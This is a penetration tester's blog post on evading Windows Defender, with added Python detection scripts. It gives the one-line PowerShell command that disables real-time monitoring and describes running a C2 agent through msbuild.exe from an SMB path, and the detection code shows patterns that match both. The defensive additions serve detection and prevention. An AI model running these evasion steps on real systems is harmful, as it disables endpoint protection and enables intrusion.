Suck it, Windows Defender.

When Invoke-Obfuscation came out in late 2016, I, and I'm sure many other pentesters, rejoiced at the fact that our commands bypassed AV like it wasn't even there. Empire payload? Easy. Privilege escalation PowerShell scripts? Not a problem.

In 2016, Windows Defender was but an annoying feature in Windows that would just catch Cain & Abel. Fast forward two years and now it's one of the best, if not the best, AV on the market. When I created ADAPE, AV didn't do anything about it. Kaspersky, McAfee, AMP, Windows Defender, etc. were all bypassed because everything was encoded using Invoke-Obfuscation. Within two months of publishing that script, Defender started hating it. I tried encoding the commands and scripts in different ways, but it still caught them. I didn't have a clue how to bypass this damn basic AV solution that was built into every modern PC.

Recently, on an engagement, I had Empire set up, and used CrackMapExec to execute the PowerShell payload on a target. Of course, it was blocked by Defender. No worries, CME supports Invoke-Obfuscation now and even has it built in with the --obfs switch. Surely it would work now, right?

Wrong. Defender even caught that. Game on. By default, Empire spits out a base64-encoded payload that looks like this when decoded.

[screenshot: ps1]

So I would historically encode it via Invoke-Obfuscation.

[screenshot: obfs1]

And it would work. Until recently.

[screenshot: obfs2.PNG]

Ok, fair enough. I only encoded it once and reversed it, so let's try encoding it a bit better.

[screenshots: obfs3.PNG, obfs4]

Really?

Ok, let’s try special characters.

[screenshots: spc1, spc2.PNG, safsa.PNG, 2.PNG]

So, it's clear Defender has caught on and now there needs to be a new method to the madness. Luckily, I found something out: why bypass AV when you can just turn it off? Yeah, they might have alerts set to ring when Defender is turned off, but at this point the engagement is dead if I can't get by, so I'm willing to take that chance.

Turning off Defender is pretty easy. It’s actually one line of PS.

Set-MpPreference -DisableRealtimeMonitoring $true

However, the catch is that you need to have administrative privileges.
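The flip side of that one-liner is that it is loud: PowerShell script block logging records the cmdlet text (Event ID 4104), and Defender itself writes Event ID 5001 ("Real-time protection is disabled") to its operational log whenever real-time protection is turned off. Here is the detection a defender would want for this step, as an added example that is not code from this post or from any of the tools it mentions. The event records are constructed and their field names are a simplified assumption, not a real log schema; the regex deliberately tolerates the abbreviated parameter names and `-Param:1` syntax that PowerShell accepts, because an exact-string match on the full cmdlet line is trivially missed.

```python
import re

# Constructed sample events (not real telemetry). Field names are a simplified
# assumption: "script" carries the ScriptBlockText of a PowerShell script block
# log entry (Event ID 4104); the Defender operational log entry uses Event ID
# 5001, which Defender writes when real-time protection is disabled.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "host": "WS01", "user": "CORP\\svc_admin",
     "script": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "host": "WS01", "user": "CORP\\svc_admin",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    # PowerShell accepts any unambiguous parameter prefix and "1" for $true,
    # so a naive exact-string match on the full cmdlet line would miss this.
    {"channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "host": "WS02", "user": "CORP\\jdoe",
     "script": "set-mppreference -disablerealtimem:1"},
    {"channel": "Microsoft-Windows-Windows Defender/Operational", "id": 5001,
     "host": "WS01", "user": "SYSTEM", "script": ""},
]

# Case-insensitive; tolerates parameter abbreviation and the "-Param:$true" form.
DISABLE_RT = re.compile(
    r"set-mppreference\b.*?-disablerealtime\w*[\s:]+(\$true|true|1)\b", re.I)


def classify(ev):
    """Name the signal an event carries, or None if it is uninteresting."""
    if ev["id"] == 4104 and DISABLE_RT.search(ev["script"]):
        return "powershell-disable-realtime-monitoring"
    if ev["id"] == 5001 and ev["channel"].endswith("Windows Defender/Operational"):
        return "defender-realtime-protection-disabled"
    return None


def scan(events):
    """Return one finding per event that matches either signal, in log order."""
    return [{"host": e["host"], "user": e["user"], "signal": s}
            for e in events if (s := classify(e))]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['signal']} (by {f['user']})")
```

The 4104 rule only sees the PowerShell route and only if script block logging is enabled; Set-MpPreference is a thin wrapper over the MSFT_MpPreference WMI class, so the same change can be made without PowerShell at all. The 5001 event is the signal that holds no matter how the setting was flipped, which is why both are checked. On the prevention side, Defender's Tamper Protection stops Set-MpPreference from disabling real-time protection even when the caller is a local administrator.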

[screenshot: block.PNG]

Last year, byt3bl33d3r published a new, awesome tool called SILENTTRINITY. I wrote an article on how to use it here, but the TL;DR version is that it's a C2 tool that utilizes IronPython and C# to execute its modules and beacon. Installing the .NET Framework also installs, by default, a tool called msbuild.exe. This executable builds C# code from an XML file, so if that XML file is really just a hook for the C2 server, it's going to build it and you have a session on the target.

So, I started using this more than Empire because you don't have to run anything 'malicious' on the target, since you can build the XML file from an SMB path.
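Nothing "malicious" is written to disk, but the process tree still tells the story: a signed build tool being handed a project file over a UNC path, started by something other than a developer's shell or a build agent. Below is that check over process-creation telemetry, as an added example that is not code from this post, SILENTTRINITY or CrackMapExec. The records are constructed in a simplified Sysmon Event ID 1 shape (field names are an assumption), and the set of "remote-execution" parent processes is a starting point for this example rather than an exhaustive list.

```python
import re

# Constructed process-creation records in a simplified Sysmon Event ID 1 /
# Security 4688 shape. Hosts, paths and the share name are made up for this
# example; the field names are an assumption, not a real log schema.
SAMPLE_PROCS = [
    {   # developer workstation: a normal build kicked off from a shell
        "host": "DEV01",
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
        "parent": r"C:\Windows\System32\cmd.exe",
    },
    {   # the pattern from the post: msbuild pulling a project file over SMB,
        # spawned by the WMI provider host (i.e. remote execution)
        "host": "WS01",
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        "cmdline": r"MSBuild.exe \\10.0.0.5\share\project.xml",
        "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
    },
    {   # unrelated process, must be ignored
        "host": "WS03",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c dir",
        "parent": r"C:\Windows\explorer.exe",
    },
]

# \\host\share anywhere on the command line.
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")
# Parents that mean the process came in over a remote-execution channel rather
# than from a developer or a build agent (assumption for this example).
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "services.exe"}
# msbuild will build any XML it is given; legitimate builds name one of these.
EXPECTED_PROJECT_EXT = (".csproj", ".vbproj", ".fsproj", ".vcxproj", ".proj", ".sln")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def msbuild_reasons(ev):
    """Reasons an msbuild.exe launch looks suspicious; empty if benign or not msbuild."""
    if basename(ev["image"]) != "msbuild.exe":
        return []
    reasons = []
    if UNC_PATH.search(ev["cmdline"]):
        reasons.append("project-loaded-from-unc-path")
    parent = basename(ev["parent"])
    if parent in REMOTE_EXEC_PARENTS:
        reasons.append("remote-exec-parent:" + parent)
    # Positional arguments that look like files but are not a conventional project type.
    for arg in ev["cmdline"].split()[1:]:
        if not arg.startswith("/") and "." in arg \
                and not arg.lower().endswith(EXPECTED_PROJECT_EXT):
            reasons.append("non-project-file-extension")
            break
    return reasons


def scan(events):
    """One finding per msbuild launch with at least one reason, in log order."""
    return [{"host": e["host"], "reasons": r}
            for e in events if (r := msbuild_reasons(e))]


if __name__ == "__main__":
    for f in scan(SAMPLE_PROCS):
        print(f"{f['host']}: msbuild.exe flagged for {', '.join(f['reasons'])}")
```

Each reason on its own produces noise on a build server; what makes the WS01 record worth an alert is that all three line up on a host that has no business compiling anything. If you cannot get process-creation telemetry with parent information, the UNC-path check alone is still worth running over the Security 4688 log with command-line auditing enabled.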

[screenshot: cme]

Once I have a session open, I then use the ipy/shell module to run the command to disable Defender.

[screenshots: st.PNG, av.PNG]

And now I can run ADAPE without being blocked. This really is a testament to how good Windows Defender is now and how far it has come. As adversary simulators, we hate this, but really we know this is awesome.
